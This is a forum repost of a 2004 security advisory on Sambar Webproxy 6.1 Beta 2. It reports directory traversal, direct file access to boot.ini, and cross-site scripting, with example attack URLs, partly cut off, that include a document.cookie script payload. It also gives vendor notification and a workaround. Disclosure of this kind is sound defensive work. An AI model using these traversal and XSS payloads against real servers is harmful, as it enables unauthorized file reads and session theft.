qcred11
Jun 2 2004, 08:06 PM
| QUOTE |
I found some vulnerabilitites in Sambar Webproxy (www.sambar.com), which
allow the sambar admin access to files outside of the application
directories.
Since Sambar comes with no password for admin as default, it might be a
security problem, if administration of Sambar proxy is allowed from any
IP (by default it is restricted to 127.0.0.1!).
In Addition, i found some XSS.
Directory Traversal
===================
http://myserver/sysadmin/system/showini.as....\boot.ini
See: www.oliverkarow.de/research/sambar_trav.GIF
Direct File Access
==================
http://localhost/sysadmin/system/showlog.a...boot.ini&tail=y
Cross Site Scripting
====================
http://localhost/sysadmin/system/show.asp?...</script>
http://localhost/sysadmin/system/showperf....t(document.cook
ie)</script>
Version
=======
I only tested Sambar 6.1 Beta 2 on Windows platform (x86). Other
versions/platforms may also be affected.
Vendor
======
www.sambar.com
Vendor is informed, and is fixing this vulns in the next release.
Workaround
==========
Set a password for admin account and restrict administration to
localhost (default).
Credits
=======
www.oliverkarow.de
www.oliverkarow.de/research/sambar.txt
|
link un-available
sent by mailing list
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
